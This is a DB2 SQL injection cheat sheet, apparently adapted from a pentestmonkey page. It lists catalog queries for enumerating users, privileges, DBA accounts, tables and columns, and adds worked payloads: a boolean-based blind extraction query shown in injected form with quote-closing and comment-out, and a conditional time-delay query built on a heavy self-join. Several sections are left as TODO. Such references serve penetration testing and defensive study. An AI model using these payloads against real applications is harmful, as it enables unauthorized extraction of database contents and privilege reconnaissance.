DB2 Injection Cheat Sheet

source: http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet

Version

select versionnumber, version_timestamp from sysibm.sysversions;

Comments

select blah from foo; -- comment like this

Current User

select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;

List Users

N/A: DB2 keeps no user table of its own. Authentication is delegated to the operating system (or to an LDAP or custom security plugin), so users cannot be enumerated from SQL. Database authorities (roughly comparable to roles) can be listed like this:
select grantee from syscat.dbauth;

List Password Hashes

N/A: for the same reason there are no password hashes in the database; credentials live with the OS or the configured security plugin.

List Privileges

select * from syscat.tabauth; -- privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select * from SYSIBM.SYSUSERAUTH; -- list DB2 system privileges (DB2 for z/OS catalog table; the syscat.* views above are DB2 LUW)

List DBA Accounts

select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'; -- DB2 for z/OS; 'G' means the authority is held with grant option. On DB2 LUW the equivalent is the DBADMAUTH column of syscat.dbauth.

Current Database

select current server from sysibm.sysdummy1;

List Databases

SELECT schemaname FROM syscat.schemata; -- DB2 cannot enumerate other databases from within a connection; this lists schemas, the closest equivalent

List Columns

select name, tbname, coltype from sysibm.syscolumns;

List Tables

select name from sysibm.systables;

Find Tables From Column Name

select tbname from sysibm.syscolumns where name='USERNAME'; -- catalog identifiers are stored in upper case unless the column was created with a quoted name

Select Nth Row

select name from (select name from sysibm.systables order by name fetch first N rows only) sq order by name desc fetch first 1 row only; -- Nth row, 1-based: take the first N rows ascending, then the last of those

Select Nth Char

SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b

Bitwise AND

DB2 has no infix bitwise operators (no &, |, ^). DB2 LUW 9.5 and later provide the scalar functions BITAND(), BITOR(), BITXOR() and BITNOT() in the SYSIBM schema, which can stand in for them; where those are missing, fall back to MOD() and integer division.

ASCII Value -> Char

select chr(65) from sysibm.sysdummy1; -- returns 'A'

Char -> ASCII Value

select ascii('A') from sysibm.sysdummy1; -- returns 65

Casting

SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;

String Concatenation

SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'

If Statement

TODO

Case Statement

TODO
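Putting the earlier pieces together (Nth row, Nth character, ASCII value and a CASE expression), here is an added example of a boolean-based blind extraction query; it is not from the original cheat sheet. It uses ROW_NUMBER() OVER (ORDER BY ...) for the Nth row, which DB2 LUW supports alongside the FETCH FIRST trick. N (row, 1-based), P (character position) and G (ASCII guess) are placeholders to substitute, and the injected form assumes the application's query ends in a quoted string.

```sql
-- Added example: boolean-based blind extraction of one character of the
-- Nth table name in sysibm.systables (not part of the original cheat sheet).
-- Placeholders: N = row number (1-based), P = character position,
-- G = ASCII value to compare against. Returns 1 when the character at
-- position P of row N is greater than G, otherwise 0, so a binary search
-- over G recovers each character in about seven requests.
-- If row N does not exist the scalar subquery is NULL and the ELSE branch
-- fires, which also yields 0.
SELECT CASE
         WHEN ASCII(SUBSTR(
                (SELECT name
                   FROM (SELECT name,
                                ROW_NUMBER() OVER (ORDER BY name) AS rn
                           FROM sysibm.systables) t
                  WHERE rn = N),
                P, 1)) > G
         THEN 1
         ELSE 0
       END
  FROM sysibm.sysdummy1;

-- Learn the length first with the same shape, because DB2 SUBSTR raises
-- an error (SQL0138) when P is beyond the end of the string instead of
-- returning an empty string; that error would break the true/false oracle.
SELECT CASE
         WHEN LENGTH(
                (SELECT name
                   FROM (SELECT name,
                                ROW_NUMBER() OVER (ORDER BY name) AS rn
                           FROM sysibm.systables) t
                  WHERE rn = N)) > G
         THEN 1
         ELSE 0
       END
  FROM sysibm.sysdummy1;

-- The same test injected into a vulnerable WHERE clause: close the quote,
-- append the comparison, comment out the remainder of the original query.
-- ' AND 1 = (SELECT CASE WHEN ASCII(SUBSTR((SELECT name FROM (SELECT name, ROW_NUMBER() OVER (ORDER BY name) AS rn FROM sysibm.systables) t WHERE rn = N), P, 1)) > G THEN 1 ELSE 0 END FROM sysibm.sysdummy1) --
```

Iterate P from 1 to the recovered length for each row N; the same skeleton works against any catalog view or application table by swapping the inner SELECT. String literals in the comparison can be avoided with chr() and concat as shown in the sections above.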

Avoiding Quotes

TODO

Time Delay

DB2 has no SLEEP()-style scalar function that can be called from a SELECT (DB2 LUW 9.7 and later ship DBMS_LOCK.SLEEP, but it is a procedure and needs a CALL context). See the Heavy Queries article for some ideas: a self-join of a large catalog view, guarded by the condition under test, gives a measurable delay.
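An added example, not from the original page, of a conditional delay built from a heavy self-join on DB2 LUW. It assumes DB2 evaluates only the CASE branch that is selected, which the optimizer does not guarantee, so the timing must be calibrated on the target; USERS is a hypothetical table name used for illustration.

```sql
-- Added example (not part of the original cheat sheet): time-based blind
-- test using a heavy query. The self-join of syscat.columns is only
-- evaluated when the guarded condition holds, so a slow response means
-- the condition is true. Assumption: DB2 evaluates only the selected CASE
-- branch; if the optimizer evaluates the subquery eagerly the delay shows
-- up regardless of the condition and this form gives no signal.
-- 'USERS' is a hypothetical table name.
SELECT CASE
         WHEN EXISTS (SELECT 1 FROM sysibm.systables WHERE name = 'USERS')
         THEN (SELECT COUNT(*) FROM syscat.columns a, syscat.columns b)
         ELSE 0
       END
  FROM sysibm.sysdummy1;

-- Calibrate first: time the heavy query on its own and add or remove
-- joined copies of the view until the delay is clearly above network
-- jitter but well below the server's query timeout.
SELECT COUNT(*) FROM syscat.columns a, syscat.columns b;
```

Measure the baseline response time of the target a few times before relying on the delay, and keep the number of joined copies small: a three-way self-join of a catalog view with thousands of rows can run for minutes and is likely to be noticed or killed.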

Make DNS Requests

TODO

Command Execution

TODO

Local File Access

TODO

Hostname, IP Address

TODO

Location of DB files

TODO

Default/System Databases

TODO